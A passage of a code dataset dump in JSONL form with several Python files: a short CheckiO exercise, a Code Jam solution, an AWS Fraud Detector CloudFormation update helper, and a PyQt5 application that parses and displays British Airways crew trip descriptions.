final element of the array together. Don't forget that the first element has an index of 0.\n# \n# For an empty array, the result will always be 0 (zero).\n# \n# Input:A list of integers.\n# \n# Output:The number as an integer.\n# \n# Precondition:0 ≤ len(array) ≤ 20\n# all(isinstance(x, int) for x in array)\n# all(-100 < x < 100 for x in array)\n# \n# \n# \n# END_DESC\n\ndef checkio(array):\n if array:\n s = 0\n for i in range(len(array)):\n if i%2 == 0:\n s+=array[i]\n return s*array[i]\n else:\n return 0\nprint (checkio([5,8,4]))","sub_path":"Elementary/even_last.py","file_name":"even_last.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"440835630","text":"def solve(K,C,S):\r\n res = set()\r\n if K == S:\r\n for i in range(1,K+1):\r\n res.add(i)\r\n if len(res) > S:\r\n return (\"IMPOSSIBLE\")\r\n else :\r\n return ' '.join(map(str, res))\r\n\r\nif __name__ == \"__main__\":\r\n T = int(input())\r\n \r\n for caseNr in range(T):\r\n K,C,S = map(int, input().split())\r\n print(\"Case #%i: %s\" % (caseNr+1, solve(K,C,S)))","sub_path":"codes/CodeJamCrawler/16_0_4_neat/16_0_4_kazuyoshi_hayase_Dsmall.py","file_name":"16_0_4_kazuyoshi_hayase_Dsmall.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"140094660","text":"import logging\nfrom cloudformation_cli_python_lib import (\n exceptions,\n)\n\nfrom . import validation_helpers, api_helpers, common_helpers, util\nfrom ..models import ResourceModel\n\n# Use this logger to forward log messages to CloudWatch Logs.\nLOG = logging.getLogger(__name__)\nLOG.setLevel(logging.DEBUG)\n\n\ndef validate_dependencies_for_update(afd_client, model: ResourceModel, previous_model: ResourceModel):\n # TODO: revisit this validation when/if we support in-place teardown\n # is_teardown_required = _determine_if_teardown_is_required(afd_client, model, previous_model)\n # if is_teardown_required and not model.AllowTeardown:\n # raise RuntimeError(TEARDOWN_CONFLICT_MESSAGE)\n _validate_event_variables_for_update(afd_client, model, previous_model)\n _validate_entity_types_for_update(afd_client, model, previous_model)\n _validate_labels_for_update(afd_client, model, previous_model)\n\n\ndef _validate_event_variables_for_update(afd_client, model: ResourceModel, previous_model: ResourceModel):\n previous_variables = {variable.Name: variable for variable in previous_model.EventVariables}\n new_event_variable_names = set()\n for event_variable in model.EventVariables:\n _validate_event_variable_for_update(afd_client, event_variable, previous_variables)\n new_event_variable_names.add(event_variable.Name)\n\n # remove previous inline variables that are no longer in the event type\n for previous_variable_name, previous_variable in previous_variables.items():\n if previous_variable_name not in new_event_variable_names and previous_variable.Inline:\n api_helpers.call_delete_variable(frauddetector_client=afd_client, variable_name=previous_variable_name)\n\n\ndef _validate_event_variable_for_update(afd_client, event_variable, previous_variables):\n if event_variable.Inline:\n _validate_inline_event_variable_for_update(afd_client, event_variable, previous_variables)\n else:\n _validate_referenced_event_variable_for_update(afd_client, event_variable)\n\n\ndef _validate_referenced_event_variable_for_update(afd_client, event_variable):\n event_variable_name = util.extract_name_from_arn(event_variable.Arn)\n get_variables_worked, _ = validation_helpers.check_if_get_variables_succeeds(afd_client, event_variable_name)\n if not get_variables_worked:\n raise exceptions.NotFound(\"event_variable\", event_variable.Arn)\n\n\ndef _validate_inline_event_variable_for_update(afd_client, event_variable, previous_variables):\n if not event_variable.Name:\n raise exceptions.InvalidRequest(\"Error occurred: inline event variables must include Name!\")\n\n # TODO: update this logic if we support in-place Teardown\n # This difference would require teardown if we were to support it\n\n # check for differences in dataSource or dataType\n differences = {}\n previous_variable = previous_variables.get(event_variable.Name, None)\n if previous_variable:\n differences = validation_helpers.check_variable_differences(previous_variable, event_variable)\n if differences[\"dataSource\"] or differences[\"dataType\"]:\n raise exceptions.InvalidRequest(\"Error occurred: cannot update event variable data source or data type!\")\n\n if not previous_variable:\n # create inline variable that does not already exist\n common_helpers.create_inline_event_variable(frauddetector_client=afd_client, event_variable=event_variable)\n else:\n # get existing variable to get arn. Arn is readonly property, so it will not be attached to input model\n (\n get_variables_worked,\n get_variables_response,\n ) = validation_helpers.check_if_get_variables_succeeds(afd_client, event_variable.Name)\n if not get_variables_worked:\n raise RuntimeError(f\"Previously existing event variable {event_variable.Name} no longer exists!\")\n event_variable.Arn = get_variables_response.get(\"variables\")[0].get(\"arn\")\n # update existing inline variable\n if hasattr(event_variable, \"Tags\"):\n common_helpers.update_tags(\n frauddetector_client=afd_client,\n afd_resource_arn=event_variable.Arn,\n new_tags=event_variable.Tags,\n )\n var_type = [None, event_variable.VariableType][event_variable.VariableType != previous_variable.VariableType]\n api_helpers.call_update_variable(\n variable_name=event_variable.Name,\n frauddetector_client=afd_client,\n variable_default_value=event_variable.DefaultValue,\n variable_description=event_variable.Description,\n variable_type=var_type,\n )\n\n\ndef _validate_entity_types_for_update(afd_client, model: ResourceModel, previous_model: ResourceModel):\n previous_entity_types = {entity_type.Name: entity_type for entity_type in previous_model.EntityTypes}\n new_entity_type_names = set()\n for entity_type in model.EntityTypes:\n _validate_entity_type_for_update(afd_client, entity_type, previous_entity_types)\n new_entity_type_names.add(entity_type.Name)\n\n # remove previous inline entity types that are no longer in the event type\n for (\n previous_entity_type_name,\n previous_entity_type,\n ) in previous_entity_types.items():\n if previous_entity_type_name not in new_entity_type_names and previous_entity_type.Inline:\n api_helpers.call_delete_entity_type(\n frauddetector_client=afd_client,\n entity_type_name=previous_entity_type_name,\n )\n\n\ndef _validate_entity_type_for_update(afd_client, entity_type, previous_entity_types):\n if entity_type.Inline:\n _validate_inline_entity_type_for_update(afd_client, entity_type, previous_entity_types)\n else:\n _validate_referenced_entity_type_for_update(afd_client, entity_type)\n\n\ndef _validate_referenced_entity_type_for_update(afd_client, entity_type):\n entity_type_name = util.extract_name_from_arn(entity_type.Arn)\n get_entity_types_worked, _ = validation_helpers.check_if_get_entity_types_succeeds(afd_client, entity_type_name)\n if not get_entity_types_worked:\n raise exceptions.NotFound(\"entity_type\", entity_type.Arn)\n\n\ndef _validate_inline_entity_type_for_update(afd_client, entity_type, previous_entity_types):\n if entity_type.Name is None:\n raise exceptions.InvalidRequest(\"Error occurred: inline entity types must include Name!\")\n\n previous_entity_type = previous_entity_types.get(entity_type.Name, None)\n if not previous_entity_type:\n # put inline entity type that does not already exist\n common_helpers.put_inline_entity_type(frauddetector_client=afd_client, entity_type=entity_type)\n else:\n # get existing entity type to get arn. Arn is readonly property, so it will not be attached to input model\n (\n get_entity_types_worked,\n get_entity_types_response,\n ) = validation_helpers.check_if_get_entity_types_succeeds(afd_client, entity_type.Name)\n if not get_entity_types_worked:\n raise RuntimeError(f\"Previously existing entity type {entity_type.Name} no longer exists!\")\n entity_type.Arn = get_entity_types_response.get(\"entityTypes\")[0].get(\"arn\")\n # put existing inline entity type and update tags\n common_helpers.put_inline_entity_type(frauddetector_client=afd_client, entity_type=entity_type)\n if hasattr(entity_type, \"Tags\"):\n common_helpers.update_tags(\n frauddetector_client=afd_client,\n afd_resource_arn=entity_type.Arn,\n new_tags=entity_type.Tags,\n )\n\n\ndef _validate_labels_for_update(afd_client, model: ResourceModel, previous_model: ResourceModel):\n previous_labels = {label.Name: label for label in previous_model.Labels}\n new_label_names = set()\n for label in model.Labels:\n _validate_label_for_update(afd_client, label, previous_labels)\n new_label_names.add(label.Name)\n\n # remove previous inline labels that are no longer in the event type\n for previous_label_name, previous_label in previous_labels.items():\n if previous_label_name not in new_label_names and previous_label.Inline:\n api_helpers.call_delete_label(frauddetector_client=afd_client, label_name=previous_label_name)\n\n\ndef _validate_label_for_update(afd_client, label, previous_labels):\n if label.Inline:\n _validate_inline_label_for_update(afd_client, label, previous_labels)\n else:\n _validate_referenced_label_for_update(afd_client, label)\n\n\ndef _validate_referenced_label_for_update(afd_client, label):\n label_name = util.extract_name_from_arn(label.Arn)\n get_labels_worked, _ = validation_helpers.check_if_get_labels_succeeds(afd_client, label_name)\n if not get_labels_worked:\n raise exceptions.NotFound(\"label\", label.Arn)\n\n\ndef _validate_inline_label_for_update(afd_client, label, previous_labels):\n if label.Name is None:\n raise exceptions.InvalidRequest(\"Error occurred: inline labels must include Name!\")\n\n previous_label = previous_labels.get(label.Name, None)\n if not previous_label:\n # put inline label that does not already exist\n common_helpers.put_inline_label(frauddetector_client=afd_client, label=label)\n else:\n # get existing label to get arn. Arn is readonly property, so it will not be attached to input model\n (\n get_labels_worked,\n get_labels_response,\n ) = validation_helpers.check_if_get_labels_succeeds(afd_client, label.Name)\n if not get_labels_worked:\n raise RuntimeError(f\"Previously existing label {label.Name} no longer exists!\")\n label.Arn = get_labels_response.get(\"labels\")[0].get(\"arn\")\n # put existing inline label and update tags\n common_helpers.put_inline_label(frauddetector_client=afd_client, label=label)\n if hasattr(label, \"Tags\"):\n common_helpers.update_tags(\n frauddetector_client=afd_client,\n afd_resource_arn=label.Arn,\n new_tags=label.Tags,\n )\n","sub_path":"aws-frauddetector-eventtype/src/aws_frauddetector_eventtype/helpers/update_worker_helpers.py","file_name":"update_worker_helpers.py","file_ext":"py","file_size_in_byte":10155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"293847222","text":"import sys, os, re, copy\n# from PyQt5.QtWidgets import QApplication, QListView, QWidget, QPushButton, QToolTip, QMainWindow, QDesktopWidget, QAction, qApp, QToolBar, QFileDialog, QTextEdit, QTabWidget, QDockWidget, QVBoxLayout, QAbstractItemView\n# from PyQt5.QtGui import QIcon, QStandardItemModel, QStandardItem, QColor\n# from PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nfrom datetime import datetime\nfrom datetime import timedelta\nfrom operator import itemgetter, attrgetter\n\n\ndef str2time(timeString):\n \"\"\"\n This function converts a time duration string in the supplied format (string, e.g. '%H%M' to a timedelta object\n\n Args:\n timeString: a time duration string\n strings in the format HHHMM HHMM or HMM and Colon delimited versions i.e. HHH:MM HH:MM or H:MM\n\n Returns:\n a timedelta object\n\n Raises:\n TBA\n \"\"\"\n if ':' not in timeString:\n\n if len(timeString) == 5:\n elapsedTimeSplit = [int(timeString[0:3]), int(timeString[3:5])]\n elif len(timeString) == 4:\n elapsedTimeSplit = [int(timeString[0:2]), int(timeString[2:4])]\n else:\n elapsedTimeSplit = [int(timeString[0]), int(timeString[1:3])]\n else:\n if len(timeString) == 6:\n elapsedTimeSplit = [int(timeString[0:3]), int(timeString[4:6])]\n elif len(timeString) == 5:\n elapsedTimeSplit = [int(timeString[0:2]), int(timeString[3:5])]\n else:\n elapsedTimeSplit = [int(timeString[0]), int(timeString[2:4])]\n\n t = timedelta(hours=elapsedTimeSplit[0], minutes=elapsedTimeSplit[1])\n return t\n\n\nclass trip(object):\n \"\"\"\n This class defines a trip object\n\n Args:\n tripData = A list of lists representing the header data for the trip:\n 1: Trip Num (integer)\n 2: Trip Num Prev (integer)\n 3: Credit Hours (timedelta object)\n 4: Fl Hours (timedelta object)\n 5: Ldgs (integer)\n 6: Pos hrs (timedelta object)\n 7: Crew (string)\n 8: TAFB (timedelta object)\n 9: Trip Len (integer)\n # 10: regularity (list of datetimes)\n 10: Report Date (date object)\n 11: Report Time (time object)\n 12: Notes (string)\n The first list is a list of strings defining the header titles\n\n\n sectData = A list of lists representing the header data for the trip:\n 1: Day (integer)\n 2: Flt Number (string)\n 3: A/C Type (string)\n 4: Dept Station (String)\n 5: Dept Time (datetime object)\n 6: Arr Station (string)\n 7: Arr Time (datetime object)\n 8: Fl Hours (timedelta object)\n 9: Meal (string)\n The first list is a list of strings defining the header titles\n\n\n sectTotData\n 1: Slip (Boolean)\n 2: Slip Destination (string)\n 3: Slip Time (timedelta object)\n 4: Tot Fl Hours (timedelta)\n 5: Duty Period (timedelta object)\n 6: Credit Hours (timedelta object)\n The first list is a list of strings defining the header titles\n\n\n Returns:\n\n Raises:\n TBA\n\n \"\"\"\n\n def __init__(self, tripData, sectData, sectTotData):\n self.tripNum = tripData[1][0]\n self.tripNumPrev = tripData[1][1]\n self.crHrs = tripData[1][2]\n self.flHrs = tripData[1][3]\n self.ldgs = tripData[1][4]\n self.pos = tripData[1][5]\n self.crew = tripData[1][6]\n self.TAFB = tripData[1][7]\n self.tripLen = tripData[1][8]\n # self.regularity = tripData[1][9]\n self.reportDate = tripData[1][9]\n self.reportTime = tripData[1][10]\n self.notes = tripData[1][11]\n self.sectData = sectData\n self.sectTotData = sectTotData\n\n # data[0][1],data[0][1],data[0][2],data[0][3],data[0][4],data[0][5],data[0][6],data[0][7],data[0][8],data[0][9],data[0][10],data[0][11]\n\n\n# def __str__ (self):\n# return '<'+str(self.length)+','+self.dest+','+self.startDate+','+self.reportTime+'>'\n\n# def get_length(self):\n# return self.length\n\n# def get_dest(self):\n# return self.dest\n# def get_startDate(self):\n# return self.startDate\n# def get_reportTime(self):\n# return self.reportTime\n# def set_length(self,length):\n# self.length=length\n# def set_dest(self,dest):\n# self.dest=dest\n# def set_startDate(self,startDate):\n# self.startDate=startDate\n# def set_reportTime(self,reportTime):\n# self.reportTime=reportTime\n\ndef createFltRegularity(regularityRaw):\n \"\"\"\n Creates a list of dates when the flight operates\n\n Args:\n regularityRaw: a list of lists contain the raw strings extracted from the trip desccriptions text file\n\n Returns:\n regularity: a list of datetime objects of when the flight operates\n\n Raises:\n TBA\n\n @author: Ed\n \"\"\"\n regularity = [] # initialise a list with 0 elements\n for rows in regularityRaw:\n startDate = datetime.date(datetime.strptime(rows[0], '%d%b%y')) # convert startDate to a date object\n if rows[0] == rows[1]:\n # there is a single date which the flight operates\n regularity.append(startDate)\n else:\n # there is more than 1 date\n daysStr = re.findall('(\\.|[MTWJFSZ])', rows[2])\n\n # calculate start date offset\n offsetFound = False\n el = 0\n while offsetFound == False:\n if daysStr[el] != '.':\n offset = el\n offsetFound = True\n else:\n el += 1\n\n # work through daysStr to see when the flight operates\n for el in daysStr:\n if el != '.': # if it operates on that day\n regularity.append(startDate + timedelta(\n days=daysStr.index(el) - offset)) # calculate date and add to the regularity list\n # update regularity matrix\n\n return regularity\n\n\ndef openTripDescriptionFile(filename):\n # open trip descriptions plain text file\n with open(filename, 'r') as file:\n\n # read the entire file\n # string = file.readlines()\n string = file.read()\n rawText = string\n\n fileEnd = False # initialise fileEnd variable\n startIndex = 0 # initialise the start index to 0, i.e the start of the string\n splitIndexStart = string.find('Trip') # find first trip description starting point\n if splitIndexStart == -1: # If the file doesn't have any 'Trip' strings within it\n print('File doesnt contain any trip descriptions') # file doesn't contain any trip descriptions\n fileEnd == True\n\n tripIndex = 0 # initialise the tripIndexCounter\n tripList = [] # initialise trip object list\n\n while not fileEnd: # loop through all trip description blocks in the file\n splitIndexEnd = string.find('Trip', splitIndexStart + 4) # find index of next 'Trip' description\n if splitIndexEnd == -1: # if there are no other occurrences of 'Trip', i.e this is the last trip in the file\n print('This is the last trip description in the file') # This is the last trip description\n tripString = string[splitIndexStart:]\n fileEnd = True\n else:\n tripString = string[splitIndexStart:splitIndexEnd]\n splitIndexStart = splitIndexEnd\n # print(tripString)\n # print('')\n # print('')\n # print('')\n\n # Determine what dates the flight operates on\n regularityRaw = re.findall('(\\d{2}[A-Z]{3}\\d{2})\\s+(\\d{2}[A-Z]{3}\\d{2})\\s+(([\\.|MTWJFSZ]\\s){7})', tripString,\n re.MULTILINE)\n regularityRaw = [list(l) for l in regularityRaw] # convert to a nested list from a nested tuple\n\n for row in regularityRaw: # remove the last element in each list as the finall regex function returns one too many groups\n del row[3]\n\n regularity = createFltRegularity(\n regularityRaw) # decode the list to form a list of dates when the flight operates\n\n # ###extract header information using regular expressions######\n # Trip Number\n tripNum = re.search('Trip\\s*(\\d{4})', tripString)\n tripNum = tripNum.group(1)\n\n # Report Date\n reportDate = regularity[0] # add the first date from the regularity list\n\n # Report Time\n reportTime = re.search('Report\\s*(\\d{4})', tripString)\n reportTime = reportTime.group(1)\n reportTime = datetime.time(datetime.strptime(reportTime, '%H%M'))\n\n # Credit Hours\n crHrs = re.search('CrHr\\s*(\\d{3,4})', tripString)\n crHrs = crHrs.group(1)\n crHrs = str2time(crHrs)\n\n # Previous Trip Number\n tripNumPrev = re.search('PREV\\s*(\\d{4})', tripString)\n if tripNumPrev != None:\n tripNumPrev = tripNumPrev.group(1)\n else:\n tripNumPrev = 'N/A'\n\n # Days in Trip\n days = re.search('Days\\s*(\\d+)', tripString)\n days = days.group(1)\n\n # Flying Hours\n flHrs = re.search('FlHr\\s*(\\d{4})', tripString)\n flHrs = flHrs.group(1)\n flHrs = str2time(flHrs)\n\n # Number of Landings\n ldgs = re.search('Ldgs\\s*(\\d+)', tripString)\n ldgs = ldgs.group(1)\n\n # Positioning Hours\n posHrs = re.search('Pos\\s*(\\d{4})', tripString)\n posHrs = posHrs.group(1)\n posHrs = str2time(posHrs)\n\n # Crew Compliment\n crew = re.search('Crew\\s*(\\w+)', tripString)\n crew = crew.group(1)\n\n # Time away from Base hours\n TAFB = re.search('TAFB\\s*(\\d{3,4})', tripString)\n TAFB = TAFB.group(1)\n TAFB = str2time(TAFB)\n\n # Notes\n notes = re.search('Note:\\s*(\\w*)', tripString)\n notes = notes.group(1)\n\n # #### Assemble tripheader list ['Trip Num','Trip Num Prev','Credit Hours','Fl Hours','Ldgs','Pos hrs','Crew','TAFB','Trip Len','Report Date','Report Time']\n tripDataHeader = ['Trip Num', 'Trip Num Prev', 'Credit Hours', 'Fl Hours', 'Ldgs', 'Pos hrs', 'Crew', 'TAFB',\n 'Trip Len', 'Report Date', 'Report Time', 'Notes']\n tripData = [tripNum, tripNumPrev, crHrs, flHrs, ldgs, posHrs, crew, TAFB, days, reportDate, reportTime, notes]\n # add the header to the start of the list\n tripData = [tripDataHeader, tripData]\n\n # ###extract sector data using regular expressions######\n # findall all sectors in the trip description. Result is a list of tuples\n sectList = re.findall(\n '(\\d\\d)\\s+(BA\\s+\\d+|\\w+)\\s+(\\d+|\\w+)\\s+(\\w{3})\\s+(\\d{4})\\s+(\\w{3})\\s+(\\d{4})\\s+(\\d+:\\d+)\\s+(\\w*)',\n tripString, re.MULTILINE)\n\n # convert list of tuples into lists of lists\n sectData = [list(elem) for elem in sectList]\n\n # DEBUG - check to see whether regular expression has found any sector data\n if not sectData:\n print('sectData is empty for some reason')\n\n # convert data to correct types\n for sect in sectData:\n # remove spaces from flight number string\n newStr = sect[1].replace(' ', '')\n sect[1] = newStr\n\n # Convert flight dep and arr times and flHrs to datetime objects\n sectDepTime = datetime.time(datetime.strptime(sect[4], '%H%M'))\n sect[4] = sectDepTime\n\n sectArrTime = datetime.time(datetime.strptime(sect[6], '%H%M'))\n sect[6] = sectArrTime\n\n sectFlHrs = str2time(sect[7])\n sect[7] = sectFlHrs\n\n # add the header to the start of the list\n sectDataHeader = ['Day', 'Flt Number', 'A/C Type', 'Dept Stn', 'Dept Time', 'Arr Stn', 'Arr Time', 'Fl Hrs',\n 'Meal']\n sectData = [sectDataHeader, sectData]\n\n # ###extract sector Totals data using regular expressions######\n sectTotList = re.findall('(S l i p)\\s+(\\w+)\\s+(\\d{3,4})\\s+Duty:\\s+(\\d+:\\d+)\\s+(\\d+:\\d+)\\s+(\\d+:\\d+)',\n tripString, re.MULTILINE)\n\n # convert list of tuples into lists of lists\n sectTotData = [list(elem) for elem in sectTotList]\n\n # Check to see whether regular expression has found any sector Tot data. If not then there isn't a slip, i.e it's a day trip\n if not sectTotData:\n print('sectTotData is empty as it\\'s a day trip')\n else:\n # convert data to correct types\n for sect in sectTotData:\n # convert Slip to boolean\n if sect[0] == 'S l i p':\n sect[0] = True\n else:\n sect[0] = False\n\n # Convert slip, FlHrs, Duty period and credit hours to datetime objects\n slipTime = str2time(sect[2])\n sect[2] = slipTime\n\n FlHrs = str2time(sect[3])\n sect[3] = FlHrs\n\n dutyHrs = str2time(sect[4])\n sect[4] = dutyHrs\n\n crHrs = str2time(sect[5])\n sect[5] = crHrs\n\n # add the header to the start of the list\n sectTotDataHeader = ['Slip?', 'Slip Dest', 'Slip Time', 'Tot Fl Hrs', 'Dty Prd', 'Credit Hrs']\n sectTotData = [sectTotDataHeader, sectTotData]\n\n # ###extract trip overall Totals data using regular expressions######\n tripTotList = re.findall('Duty:\\s+(\\d+:\\d+)\\s+(\\d+:\\d+)\\s+(\\d+:\\d+)', tripString, re.MULTILINE)\n\n # convert list of tuples into lists of lists\n tripTotData = [list(elem) for elem in tripTotList]\n\n # Convert total FlHrs, total Duty period and total credit hours to datetime objects\n FlHrs = str2time(tripTotData[0][0])\n tripTotData[0][0] = FlHrs\n\n dutyHrs = str2time(tripTotData[0][1])\n tripTotData[0][1] = dutyHrs\n\n crHrs = str2time(tripTotData[0][2])\n tripTotData[0][2] = crHrs\n\n # Append the overall total list to the sectTotData list\n # print('sectData=', sectData)\n sectTotData.append(tripTotData[0])\n\n # print('tripData= ', tripData)\n # print('')\n # print('')\n # print('sectTotData=', sectTotData)\n\n # Create the trip Object\n tripList.append(trip(tripData, sectData, sectTotData))\n # print(tripList[tripIndex].tripNum)\n tripIndex += 1 # increment the trip index\n\n # create a duplicate trip object for each date in the regularity list\n for dates in regularity[1:]:\n tripCopy = copy.deepcopy(tripList[tripIndex - 1])\n # overwrite the reportDate attribute with the next date in the regularity list\n tripCopy.reportDate = dates\n tripList.append(tripCopy)\n\n return [rawText, tripList]\n\n\n#### Sort functions ####\n# sort by trip length\ndef sortTripLength(tripList):\n tripListSorted = sorted(tripList, key=attrgetter('crHrs', 'tripLen'))\n return tripListSorted\n\n\ndef writeSortedList(sortedList, filename):\n # write the sorted list to a file\n with open(filename, 'w') as file:\n totStr = 'Total Number of Trips = ' + str(len(sortedList)) + '\\n'\n file.write(totStr)\n for obj in sortedList:\n strLine = str(obj.reportDate) + ', ' + str(obj.tripNum) + ', ' + str(obj.crHrs) + ', ' + str(\n obj.tripLen) + '\\n'\n file.write(strLine)\n\n\nclass mainWindow(QMainWindow):\n\n def __init__(self):\n\n # call the parent initialisation\n super().__init__()\n\n # create the main window\n self.createMainWindowUI()\n\n def createMainWindowUI(self):\n\n # create main window\n self.setWindowTitle('BA Trip Viewer')\n\n # self.layout = QVBoxLayout(self)\n\n # store screen geometry\n screen = QDesktopWidget().screenGeometry()\n\n # set main window icon\n self.setWindowIcon(QIcon('icons/Air-Plane-icon.png'))\n\n # create the status bar\n self.statusBar().showMessage('Application Ready')\n\n # Create menubar/toolbar action items\n openAction = QAction(QIcon('icons/open-file-icon.png'), 'Open', self)\n openAction.setStatusTip('Open a BA Trip Description File')\n openAction.setToolTip('Opens a BA Trip Description File')\n openAction.triggered.connect(self.openFile)\n\n saveAction = QAction(QIcon('icons/save-file-icon.png'), 'Save', self)\n saveAction.setStatusTip('Save BATripViewer session')\n saveAction.setToolTip('Save BATripViewer session')\n saveAction.triggered.connect(self.saveFile)\n\n closeAction = QAction(QIcon('icons/close-file-icon.png'), 'Close', self)\n closeAction.setStatusTip('Close Trip Description file and data')\n closeAction.setToolTip('Close Trip Description file and data')\n closeAction.triggered.connect(qApp.quit) # needs changing to something sensible\n\n exitAction = QAction(QIcon('icons/exit-file-icon.png'), '&Exit', self)\n exitAction.setStatusTip('Exit Application')\n exitAction.setToolTip('Exits the application')\n exitAction.triggered.connect(qApp.quit) # needs changing to something sesnsible\n\n # create a menubar and add menu items\n menubar = self.menuBar()\n fileMenu = menubar.addMenu('&File')\n\n # add actions to the menu items\n fileMenu.addAction(openAction)\n fileMenu.addAction(saveAction)\n fileMenu.addAction(closeAction)\n fileMenu.addAction(exitAction)\n\n # create a toolbar and assign actions\n topToolbar = self.addToolBar('fileItems')\n topToolbar.addAction(openAction)\n topToolbar.addAction(saveAction)\n topToolbar.addAction(closeAction)\n\n # create a tab widget and set it to be the central widget\n self.tabWidget = QTabWidget()\n self.setCentralWidget(self.tabWidget)\n self.tab1 = QWidget()\n self.tab2 = QWidget()\n self.tab3 = QWidget()\n\n # create tabs\n self.tabWidget.addTab(self.tab1, 'Trip Raw Data File')\n self.tabWidget.addTab(self.tab2, 'Trip List View')\n self.tabWidget.addTab(self.tab3, 'Trip Timeline View')\n\n # create tab content for tab1\n self.tab1.layout = QVBoxLayout(self)\n self.tripRaw_textEdit = QTextEdit()\n self.tab1.layout.addWidget(self.tripRaw_textEdit)\n self.tab1.setLayout(self.tab1.layout)\n\n # create tab content for tab2\n self.tab2.layout = QVBoxLayout(self)\n self.tripList_listView = QListView()\n self.tab2.layout.addWidget(self.tripList_listView)\n self.tab2.setLayout(self.tab2.layout)\n\n # create tab content for tab3\n self.tab3.layout = QVBoxLayout(self)\n self.tripTimeline_textEdit = QTextEdit() # custom widget required for this?\n self.tab3.layout.addWidget(self.tripTimeline_textEdit)\n self.tab3.setLayout(self.tab3.layout)\n\n # create a left aligned dock widget and create the controls\n self.dockWidget = QDockWidget(self)\n self.dockWidget.setObjectName(\"dockWidget\")\n\n # create widget content sub class to in order to resize correctly\n class dockWidgetContentLeft(QWidget):\n def sizeHint(self):\n # obtain QCalendar width\n temp = QCalendarWidget()\n calGeom = temp.geometry()\n calWidth = calGeom.width()\n return QSize(calWidth + 200, 0) # set left dock width to calendar width + 10\n\n self.dockWidgetContents = dockWidgetContentLeft()\n # self.dockWidgetContents = QWidget()\n self.dockWidgetContents.setObjectName(\"dockWidgetContents\")\n self.dockWidget.setWidget(self.dockWidgetContents)\n self.addDockWidget(Qt.DockWidgetArea(1), self.dockWidget)\n # self.dockWidget.setGeometry(0, 0, 778, 685)\n\n self.verticalLayoutWidget = QWidget(self.dockWidgetContents)\n # self.verticalLayoutWidget.setGeometry(QRect(0, 0, 778, 685))\n self.verticalLayoutWidget.setObjectName(\"verticalLayoutWidget\")\n self.verticalLayout = QVBoxLayout(self.verticalLayoutWidget)\n self.verticalLayout.setContentsMargins(50, 50, 50, 50)\n self.verticalLayout.setObjectName(\"verticalLayout\")\n self.checkBox_2 = QCheckBox(self.verticalLayoutWidget)\n self.checkBox_2.setObjectName(\"checkBox_2\")\n self.verticalLayout.addWidget(self.checkBox_2)\n self.checkBox_3 = QCheckBox(self.verticalLayoutWidget)\n self.checkBox_3.setObjectName(\"checkBox_3\")\n self.verticalLayout.addWidget(self.checkBox_3)\n self.checkBox = QCheckBox(self.verticalLayoutWidget)\n self.checkBox.setObjectName(\"checkBox\")\n self.verticalLayout.addWidget(self.checkBox)\n self.dateTimeEdit = QDateTimeEdit(self.verticalLayoutWidget)\n self.dateTimeEdit.setObjectName(\"dateTimeEdit\")\n self.verticalLayout.addWidget(self.dateTimeEdit)\n self.calendarWidget = QCalendarWidget(self.verticalLayoutWidget)\n self.calendarWidget.setObjectName(\"calendarWidget\")\n self.verticalLayout.addWidget(self.calendarWidget)\n self.dockWidget.setWidget(self.dockWidgetContents)\n\n\n # create widget content sub class to in order to resize correctly\n class dockWidgetContentBottom(QWidget):\n def sizeHint(self):\n return QSize(0, 500) # set left dock width to calendar width + 10\n\n # create a bottom aligned dock widget\n self.dockWidget_2 = QDockWidget(self)\n self.dockWidget_2.setObjectName(\"dockWidget_2\")\n self.dockWidgetContents_2 = dockWidgetContentBottom()\n self.dockWidgetContents_2.setObjectName(\"dockWidgetContents_2\")\n self.dockWidget_2.setWidget(self.dockWidgetContents_2)\n self.addDockWidget(Qt.DockWidgetArea(8), self.dockWidget_2)\n\n\n\n\n # add a calendar widget to the left aligned docwidget\n\n\n # # create push button\n # btn = QPushButton(self)\n # btn.setGeometry(200, 200, 200, 50)\n # btn.setText('Quit')\n # btn.setToolTip('This is a button that closes the window')\n\n # button clicked event\n # btn.clicked.connect(QApplication.instance().quit)\n\n # show the window\n self.show()\n\n # maximise the mainWindowR\n self.showMaximized()\n\n def openFile(self):\n\n # filter just .txt files\n filter = 'Txt File (*.txt)'\n\n # set home directory\n home_directory = os.getcwd()\n\n fname = QFileDialog.getOpenFileName(self, 'Open BA Trip Description File', home_directory, filter)\n\n if fname[0]:\n\n # read the trip description file\n tripFileData = openTripDescriptionFile(fname[0])\n\n # load the raw data part into the text edit box on the Trip Raw Data file tab\n x = str(tripFileData[0])\n self.tripRaw_textEdit.setText(x)\n # self.tripRaw_textEdit.setText('Hello')\n\n # create a model for the list and load the processed list of trip objects into the list view on the trip List tab\n model = QStandardItemModel(self.tripList_listView)\n for obj in tripFileData[1]:\n # item = QStandardItem(i)\n itemText = str(obj.tripNum) + ', ' + str(obj.reportDate) + ', ' + str(obj.crHrs) + ', ' + str(obj.tripLen)\n item = QStandardItem(itemText)\n item.setCheckable(True)\n\n # colour the item depending on trip length\n if obj.tripLen == '1':\n item.setBackground(QColor(0, 255, 0)) # green\n elif obj.tripLen == '2':\n item.setBackground(QColor(0, 0, 255)) # blue\n elif obj.tripLen == '3':\n item.setBackground(QColor(255, 255, 0)) # yellow\n elif obj.tripLen == '4':\n item.setBackground(QColor(124, 124, 124)) # grey\n elif obj.tripLen == '5':\n item.setBackground(QColor(255, 0, 0)) # red\n # else:\n # item.setBackground(QColor(255, 255, 255)) # white\n\n model.appendRow(item)\n\n # apply the model to the list\n self.tripList_listView.setModel(model)\n\n # make the items not editable\n self.tripList_listView.setEditTriggers(QAbstractItemView.NoEditTriggers)\n\n # make the background colour light blue\n\n\n def saveFile(self):\n\n # filter just .BTV files\n filter = 'BTV File (*.btv)'\n\n # set home directory\n home_directory = os.getcwd()\n\n fname = QFileDialog.getSaveFileName(self, 'Save BA Trip Viewer File', home_directory, filter)\n\n if fname[0]:\n f = open(fname[0], 'w')\n\n with f:\n data = 'TBA' # write routine goes here in the meantime print TBA\n f.write(data)\n\n\n\nif __name__ == '__main__':\n # generate the application\n app = QApplication(sys.argv)\n\n # generate the window object\n w = mainWindow()\n\n # run the application\n 